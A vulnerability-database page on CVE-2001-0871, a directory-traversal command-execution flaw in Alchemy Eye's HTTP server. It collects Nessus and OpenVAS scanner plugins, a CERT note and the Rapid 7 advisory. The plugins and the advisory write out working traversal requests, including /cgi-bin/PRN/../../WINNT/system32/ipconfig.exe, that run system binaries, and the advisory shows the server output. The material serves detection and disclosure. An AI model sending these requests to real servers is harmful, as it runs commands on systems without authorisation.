ID ALCHEMY_EYE_HTTP.NASL Type nessus Reporter This script is Copyright (C) 2001-2021 H D Moore & Drew Hintz ( http://guh.nu ) Modified 2001-12-03T00:00:00
Description
Alchemy Eye and Alchemy Network Monitor are network management tools
for Microsoft Windows. The product contains a built-in HTTP server for
remote monitoring and control. A directory traversal flaw in this HTTP
server (CVE-2001-0871) allows arbitrary commands to be run on the server
by a remote attacker.
#%NASL_MIN_LEVEL 70300
#
# This script was written by Drew Hintz ( http://guh.nu )
#
# It is based on scripts written by Renaud Deraison and HD Moore
#
# See the Nessus Scripts License for details
#
# Changes by Tenable:
# - Description whitespace touch-up, added see-also (3/15/10)
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration pass: when the engine sets `description`, the plugin only
# declares its metadata below and exits without sending any traffic.
if (description)
{
# Plugin identity and revision tracking.
script_id(10818);
script_version("1.27");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
# External identifiers for the same issue.
script_cve_id("CVE-2001-0871");
script_bugtraq_id(3599);
script_name(english:"Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution");
script_summary(english:"Determine if arbitrary commands can be executed by Alchemy Eye");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a remote command execution
vulnerability.");
script_set_attribute(attribute:"description", value:
"Alchemy Eye and Alchemy Network Monitor are network management tools
for Microsoft Windows. The product contains a built-in HTTP server for
remote monitoring and control. This HTTP server allows arbitrary
commands to be run on the server by a remote attacker.");
script_set_attribute(attribute:"see_also", value:"http://www.rapid7.com/security-center/advisories/R7-0001.jsp");
# Both options are configuration workarounds, not a fixed release. The
# Rapid 7 advisory R7-0001 adds that the product must be restarted for either
# to take effect, and that the authentication option exists only in 2.6.x
# and later.
script_set_attribute(attribute:"solution", value:
"Either disable HTTP access in Alchemy Eye, or require authentication
for Alchemy Eye. Both of these can be set in the Alchemy Eye
preferences.");
# CVSS v2 base: reachable over the network, low complexity, no
# authentication, partial impact on confidentiality, integrity, availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
# CVSS v2 temporal: E:H, RL:U (no remediation available), RC:C (confirmed).
script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2001/11/29");
script_set_attribute(attribute:"plugin_publication_date", value:"2001/12/03");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
# NOTE(review): the probe further down requests net.exe through the traversal
# path, so a vulnerable target actually runs that binary. Confirm that
# ACT_GATHER_INFO is the intended category for a check with that side effect;
# the OpenVAS port of this same check registers as ACT_ATTACK.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2001-2021 H D Moore & Drew Hintz ( http://guh.nu )");
script_family(english:"CGI abuses");
# Scheduled after service discovery and HTTP version detection.
script_dependencie("find_service1.nasl", "http_version.nasl");
# Requires the www/alchemy knowledge-base key; presumably an earlier
# detection plugin sets it once the product is identified (verify which one).
script_require_keys("www/alchemy");
script_require_ports("Services/www", 80);
exit(0);
}
#
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
# Pick the HTTP port to probe, defaulting to 80. embedded:TRUE presumably
# lets the check run against embedded web servers such as the one built into
# the product (confirm against http_func.inc).
port = get_http_port(default:80, embedded:TRUE);

# Nothing to test when the chosen port is not reported as open.
if (!get_port_state(port))
{
  exit(0);
}
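# Request one candidate path and flag the host when the reply shows that
# net.exe was executed.
#
# req : URL path to request on the global `port`.
#
# Returns 0 when this probe is inconclusive (no reply, or no marker in the
# reply). On a match it reports the finding and ends the plugin.
function check(req)
{
  local_var request, r, pat;

  request = http_get(item:req, port:port);
  r = http_keepalive_send_recv(port:port, data:request);

  # A missing reply only makes this one variant inconclusive. Return to the
  # caller so the remaining path variants are still tried; exiting here would
  # turn a single dropped request into a silent false negative.
  if ( r == NULL ) return(0);

  # Fragment of the usage text net.exe prints when started without arguments.
  # The Rapid 7 advisory notes this server cannot pass arguments to the
  # binary, so usage output is what a vulnerable host is expected to return.
  pat = "ACCOUNTS | COMPUTER";
  if (pat >< r)
  {
    security_hole(port:port);
    exit(0);
  }

  return(0);
}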
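# Path prefixes placed between /cgi-bin and the traversal sequence: two DOS
# device names, then no prefix at all. Per the Rapid 7 advisory, versions 2.0
# through 2.6.18 are affected by the plain `..` form and 2.6.19 through 3.0.10
# by the device-name form, so all three need to be requested.
dir[0] = "/PRN";
dir[1] = "/NUL";
dir[2] = "";

# Iterate over the values rather than testing dir[d] as the loop condition:
# an empty string evaluates as false in a NASL condition, so a loop of the
# form for(d=0;dir[d];d=d+1) stops before the empty prefix and never sends
# the plain /cgi-bin/.. request.
foreach prefix (make_list(dir[0], dir[1], dir[2]))
{
  url = string("/cgi-bin", prefix, "/../../../../../../../../WINNT/system32/net.exe");
  # check() reports and exits on the first variant that matches.
  check(req:url);
}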
{"id": "ALCHEMY_EYE_HTTP.NASL", "bulletinFamily": "scanner", "title": "Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution", "description": "Alchemy Eye and Alchemy Network Monitor are network management tools\nfor Microsoft Windows. The product contains a built-in HTTP server for\nremote monitoring and control. This HTTP server allows arbitrary\ncommands to be run on the server by a remote attacker.", "published": "2001-12-03T00:00:00", "modified": "2001-12-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/10818", "reporter": "This script is Copyright (C) 2001-2021 H D Moore & Drew Hintz ( http://guh.nu )", "references": ["http://www.rapid7.com/security-center/advisories/R7-0001.jsp"], "cvelist": ["CVE-2001-0871"], "type": "nessus", "lastseen": "2021-01-20T09:23:59", "edition": 17, "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-0871"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231010818"]}, {"type": "cert", "idList": ["VU:220715"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:2234"]}, {"type": "osvdb", "idList": ["OSVDB:684"]}], "modified": "2021-01-20T09:23:59", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-01-20T09:23:59", "rev": 2}, "vulnersScore": 7.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Drew Hintz ( http://guh.nu )\n#\n# It is based on scripts written by Renaud Deraison and HD Moore\n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Description whitespace touch-up, added see-also (3/15/10)\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(10818);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2001-0871\");\n script_bugtraq_id(3599);\n\n script_name(english:\"Alchemy 
Eye/Network Monitor Traversal Arbitrary Command Execution\");\n script_summary(english:\"Determine if arbitrary commands can be executed by Alchemy Eye\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Alchemy Eye and Alchemy Network Monitor are network management tools\nfor Microsoft Windows. The product contains a built-in HTTP server for\nremote monitoring and control. This HTTP server allows arbitrary\ncommands to be run on the server by a remote attacker.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.rapid7.com/security-center/advisories/R7-0001.jsp\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either disable HTTP access in Alchemy Eye, or require authentication\nfor Alchemy Eye. Both of these can be set in the Alchemy Eye\npreferences.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2001-2021 H D Moore & Drew Hintz ( http://guh.nu )\");\n script_family(english:\"CGI abuses\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_keys(\"www/alchemy\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = 
get_http_port(default:80, embedded:TRUE);\n\nif(!get_port_state(port))exit(0);\n\nfunction check(req)\n{\n local_var r, pat;\n\n req = http_get(item:req, port:port);\n r = http_keepalive_send_recv(port:port, data:req);\n if ( r == NULL ) exit(0);\n pat = \"ACCOUNTS | COMPUTER\";\n if(pat >< r) {\n \tsecurity_hole(port:port);\n\texit(0);\n \t}\n return(0);\n}\n\ndir[0] = \"/PRN\";\ndir[1] = \"/NUL\";\ndir[2] = \"\";\n\nfor(d=0;dir[d];d=d+1)\n{\n\turl = string(\"/cgi-bin\", dir[d], \"/../../../../../../../../WINNT/system32/net.exe\");\n\tcheck(req:url);\n}\n", "naslFamily": "CGI abuses", "pluginID": "10818", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:19:25", "description": "Directory traversal vulnerability in HTTP server for Alchemy Eye and Alchemy Network Monitor allows remote attackers to execute arbitrary commands via an HTTP request containing (1) a .. in versions 2.0 through 2.6.18, or (2) a DOS device name followed by a .. in versions 2.6.19 through 3.0.10.", "edition": 5, "cvss3": {}, "published": "2001-12-21T05:00:00", "title": "CVE-2001-0871", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0871"], "modified": "2017-12-19T02:29:00", "cpe": ["cpe:/a:alchemy_lab:alchemy_eye:2.6", "cpe:/a:alchemy_lab:alchemy_eye:2.0", "cpe:/a:alchemy_lab:alchemy_eye:2.6.19", "cpe:/a:alchemy_lab:alchemy_eye:3.0", "cpe:/a:alchemy_lab:alchemy_eye:2.4", "cpe:/a:alchemy_lab:alchemy_eye:2.1", "cpe:/a:alchemy_lab:alchemy_eye:2.3", "cpe:/a:alchemy_lab:alchemy_eye:2.2", "cpe:/a:alchemy_lab:alchemy_eye:2.6.18", "cpe:/a:dek_software:alchemy_network_monitor:3.0.10", "cpe:/a:alchemy_lab:alchemy_eye:2.5", "cpe:/a:alchemy_lab:alchemy_eye:3.0.10"], "id": "CVE-2001-0871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0871", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:alchemy_lab:alchemy_eye:2.6.19:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:3.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:alchemy_lab:alchemy_eye:2.6.18:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:dek_software:alchemy_network_monitor:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.2:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T15:08:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0871"], "description": "Alchemy Eye and Alchemy Network Monitor are network management\n tools for Microsoft Windows. The product contains a built-in HTTP\n server for remote monitoring and control. This HTTP server allows\n arbitrary commands to be run on the server by a remote attacker.", "modified": "2020-05-08T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010818", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010818", "type": "openvas", "title": "Alchemy Eye HTTP Command Execution", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Description: Alchemy Eye HTTP Command Execution\n#\n# Authors:\n# Drew Hintz ( http://guh.nu )\n# Based on scripts written by Renaud Deraison and HD Moore\n#\n# Copyright:\n# Copyright (C) 2001 H D Moore & Drew Hintz ( http://guh.nu )\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10818\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(3599);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2001-0871\");\n script_name(\"Alchemy Eye HTTP Command Execution\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2001 H D Moore & Drew Hintz ( http://guh.nu )\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_alchemy_eye_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"alchemy_eye/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/243404\");\n\n script_tag(name:\"summary\", value:\"Alchemy Eye and Alchemy Network Monitor are network management\n tools for Microsoft Windows. The product contains a built-in HTTP\n server for remote monitoring and control. This HTTP server allows\n arbitrary commands to be run on the server by a remote attacker.\");\n\n script_tag(name:\"solution\", value:\"Either disable HTTP access in Alchemy Eye, or require\n authentication for Alchemy Eye. 
Both of these can be set in the Alchemy Eye preferences.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nforeach dir( make_list( \"/PRN\", \"/NUL\", \"\" ) ) {\n\n url = string(\"/cgi-bin\", dir, \"/../../../../../../../../WINNT/system32/net.exe\");\n\n req = http_get( item:url, port:port );\n res = http_keepalive_send_recv( port:port, data:req );\n if(!res)\n continue;\n\n if( \"ACCOUNTS | COMPUTER\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:44:20", "bulletinFamily": "info", "cvelist": ["CVE-2001-0871"], "description": "### Overview \n\nAlchemy Eye does not properly validate HTTP requests, allowing arbitrary command execution.\n\n### Description \n\nAlchemy Eye includes an HTTP server for remote system monitoring and control. In versions 2.0 through 2.6 of Alchemy Eye, the HTTP server component does not adequately validate HTTP requests, allowing attackers to execute arbitrary commands. \n \n--- \n \n### Impact \n\nRemote attackers can execute arbitrary commands on the server. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of a practical solution to this problem. \n \n--- \n \n### Vendor Information\n\n220715\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Alchemy Lab Affected\n\nUpdated: September 25, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220715 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.rapid7.com/advisories/R7-0001.txt>\n * <http://www.securityfocus.com/bid/3599>\n * <http://www.alchemy-lab.com/products/eye/>\n * <http://www.deksoftware.com/alchemy/>\n\n### Acknowledgements\n\nThanks to Rapid 7 for reporting this vulnerability.\n\nThis document was written by Shawn Van Ittersum.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2001-0871](<http://web.nvd.nist.gov/vuln/detail/CVE-2001-0871>) \n---|--- \n**Severity Metric:** | 6.50 \n**Date Public:** | 2001-11-29 \n**Date First Published:** | 2002-09-27 \n**Date Last Updated: ** | 2003-09-18 20:14 UTC \n**Document Revision: ** | 6 \n", "modified": "2003-09-18T20:14:00", "published": "2002-09-27T00:00:00", "id": "VU:220715", "href": "https://www.kb.cert.org/vuls/id/220715", "type": "cert", "title": "Alchemy Eye HTTP Server does not adequately validate user input thereby allowing remote command execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:05", "bulletinFamily": "software", "cvelist": ["CVE-2001-0871"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n_______________________________________________________________________\r\n Rapid 7, Inc. 
Security Advisory\r\n\r\n Visit http://www.rapid7.com to download NeXpose(tm), our\r\n advanced vulnerability scanner. Linux and Windows 2000\r\n versions are available now!\r\n_______________________________________________________________________\r\n\r\nRapid 7 Advisory R7-0001: Alchemy Eye HTTP Remote Command Execution\r\n\r\n Published: November 29, 2001\r\n Revision: 1.0\r\n CVE ID: CAN-2001-0871\r\n Bugtraq ID: 3599\r\n\r\n1. Affected system(s):\r\n\r\n KNOWN VULNERABLE:\r\n o Alchemy Eye and Alchemy Network Monitor v2.0 through v2.6.18\r\n (vulnerable to first variant, see below)\r\n o Alchemy Eye and Alchemy Network Monitor v2.6.19 through v3.0.10\r\n (vulnerable to second variant, see below)\r\n\r\n Apparently NOT VULNERABLE:\r\n o Alchemy Eye v1.7 (has no web access feature)\r\n o Alchemy Eye v1.8 (has no web access feature)\r\n\r\n2. Summary\r\n\r\n Alchemy Eye and Alchemy Network Monitor are network management\r\n tools for Microsoft Windows. The product contains a built-in HTTP\r\n server for remote monitoring and control. This HTTP server allows\r\n arbitrary commands to be run on the server by a remote\r\n attacker.\r\n\r\n The Common Vulnerabilities and Exposures (CVE) project has assigned\r\n the identifier CAN-2001-0871 to this issue. This is a candidate for\r\n inclusion in the CVE list (http://cve.mitre.org), which standardizes\r\n names for security problems.\r\n\r\n Bugtraq has assigned the identifier 3599 to this vulnerability.\r\n More information on Bugtraq can be found at http://www.securityfocus.com\r\n\r\n3. Vendor status and information\r\n\r\n Alchemy Eye\r\n Alchemy Labs, Inc.\r\n http://www.alchemy-lab.com/products/eye/\r\n\r\n Alchemy Network Monitor\r\n DEK Software, Inc.\r\n http://www.deksoftware.com/alchemy/\r\n\r\n Vendors notified 7/25/2001. 
Initial problem fixed shortly thereafter\r\n but subsequent releases (up to and including the current release,\r\n v3.0.10) are still vulnerable to a variant of the same attack.\r\n Vendor is aware of the problems but has stopped responding to\r\n our emails.\r\n\r\n4. Solution\r\n\r\n The current version of the product is VULNERABLE. Future versions may\r\n also be vulnerable. If you are using any of the vulnerable versions,\r\n we suggest the following:\r\n\r\n (a) Disable HTTP access completely via Preferences. You must\r\n restart the product for this to take effect.\r\n\r\n or, (b) Require HTTP authentication via Preferences. You must\r\n restart the product for this to take effect. This is only possible\r\n with versions 2.6.x and later (earlier versions have no\r\n authentication option).\r\n\r\n (c) Create a very restricted user account and run the product under\r\n those credentials.\r\n\r\n5. Detailed analysis\r\n\r\n Versions 2.x through 2.6 are vulnerable to arbitrary remote command\r\n execution by using a simple dotdot traversal.\r\n\r\n $ telnet localhost 80\r\n Trying 127.0.0.1...\r\n Connected to localhost.\r\n Escape character is '^]'.\r\n GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0\r\n\r\n HTTP/1.0 200 OK\r\n Date: Thu, 29 Nov 2001 18:20:00 GMT\r\n Server: Alchemy Eye/2.0.20\r\n MIME-version: 1.0\r\n Content-Type: text/html\r\n Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe\r\n Content-Length: 275\r\n\r\n\r\n Windows 2000 IP Configuration\r\n\r\n Ethernet adapter Cable:\r\n\r\n Connection-specific DNS Suffix . : foo.bar.com\r\n IP Address. . . . . . . . . . . . : 192.168.0.2\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . 
: 192.168.0.1\r\n\r\n\r\n Later patched 2.6 revisions are not vulnerable to the simple dotdot\r\n traversal:\r\n\r\n $ telnet localhost 80\r\n Trying 127.0.0.1...\r\n Connected to localhost.\r\n Escape character is '^]'.\r\n GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0\r\n\r\n HTTP/1.0 403 Forbidden\r\n Server: Alchemy Eye/2.6.16\r\n MIME-version: 1.0\r\n Content-Type: text/plain\r\n Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe\r\n Content-Length: 9\r\n\r\n Forbidden\r\n\r\n\r\n However, these versions are vulnerable to a variant that combines\r\n dotdot traversal with the special Windows device name "NUL":\r\n\r\n $ telnet localhost 80\r\n Trying 127.0.0.1...\r\n Connected to localhost.\r\n Escape character is '^]'.\r\n GET /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe HTTP/1.0\r\n\r\n HTTP/1.0 200 OK\r\n Server: Alchemy Eye/2.6.16\r\n MIME-version: 1.0\r\n Content-Type: text/html\r\n Location: /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe\r\n Content-Length: 275\r\n\r\n\r\n Windows 2000 IP Configuration\r\n\r\n Ethernet adapter Cable:\r\n\r\n Connection-specific DNS Suffix . : foo.bar.com\r\n IP Address. . . . . . . . . . . . : 192.168.0.2\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n\r\n\r\n Versions 2.7.x and above address the "NUL" issue but are still vulnerable\r\n if you use a device name other than "NUL", e.g. "PRN":\r\n\r\n $ telnet localhost 80\r\n Trying 127.0.0.1...\r\n Connected to localhost.\r\n Escape character is '^]'.\r\n GET /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe HTTP/1.0\r\n\r\n HTTP/1.0 200 OK\r\n Server: Alchemy Eye/3.0.10\r\n MIME-version: 1.0\r\n Content-Type: text/html\r\n Location: /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe\r\n Content-Length: 275\r\n\r\n\r\n Windows 2000 IP Configuration\r\n\r\n Ethernet adapter Cable:\r\n\r\n Connection-specific DNS Suffix . : foo.bar.com\r\n IP Address. . . . . . . . . . . 
. : 192.168.0.2\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n\r\n\r\n The attacker can not run commands with arguments because\r\n the HTTP server does not handle URL-encoded spaces (%20),\r\n nor does it handle actual spaces.\r\n\r\n6. Contact Information\r\n\r\n Rapid 7 Security Advisories\r\n Email: advisory@rapid7.com\r\n Web: http://www.rapid7.com\r\n Phone: +1 (212) 558-8700\r\n\r\n7. Disclaimer and Copyright\r\n\r\n Rapid 7, Inc. is not responsible for the misuse of the information\r\n provided in our security advisories. These advisories are a service\r\n to the professional security community. There are NO WARRANTIES\r\n with regard to this information. Any application or distribution of\r\n this information constitutes acceptance AS IS, at the user's own\r\n risk. This information is subject to change without notice.\r\n\r\n This advisory Copyright (C) 2001 Rapid 7, Inc. Permission is\r\n hereby granted to redistribute this advisory in electronic media\r\n only, providing that no changes are made and that the copyright\r\n notices and disclaimers remain intact. 
This advisory may not be\r\n printed or distributed in non-electronic media without the\r\n express written permission of Rapid 7, Inc.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 7.0.1\r\n\r\niQEVAwUBPAcMn+stPa8cHEsJAQEZUQgAwPeHJLOusOnIN88hFPOX56efWkcliduK\r\naetWtYbPLzNKhgSxJeWEddTzZeT3i/ulwT810jQyS4nfxGlZa2JvaXMXeAwxKLXm\r\nIMXAymCbXKdP4D/SYe5/kLUeWcnujgyYz0m3Y2qmcGDjhaizm8iWxvYUPunX6/ra\r\n6fXTjQjjqRnB75sTx4FZYglvE4o0FFNNQmEvbPJXmF0No7X/KFaDAM4DD/R/H1IL\r\nC6aAed9NppY2KizzO7pf3Rd3M1kJax3xC6+8hQWYplHJZN3WQ+msNlpq/2O6D5Gg\r\ndzIi8ANkGzzrw1y4ZbYPTFvmyVE6sQTW5ShH5t69bl6iGieVtS9JIQ==\r\n=keCq\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2001-12-01T00:00:00", "published": "2001-12-01T00:00:00", "id": "SECURITYVULNS:DOC:2234", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:2234", "title": "Rapid 7 Advisory R7-0001: Alchemy Eye HTTP Remote Command Execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2001-0871"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.alchemy-lab.com/\nSnort Signature ID: 1505\nSnort Signature ID: 1506\n[CVE-2001-0871](https://vulners.com/cve/CVE-2001-0871)\nBugtraq ID: 3599\n", "modified": "2001-11-29T00:00:00", "published": "2001-11-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:684", "id": "OSVDB:684", "title": "Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}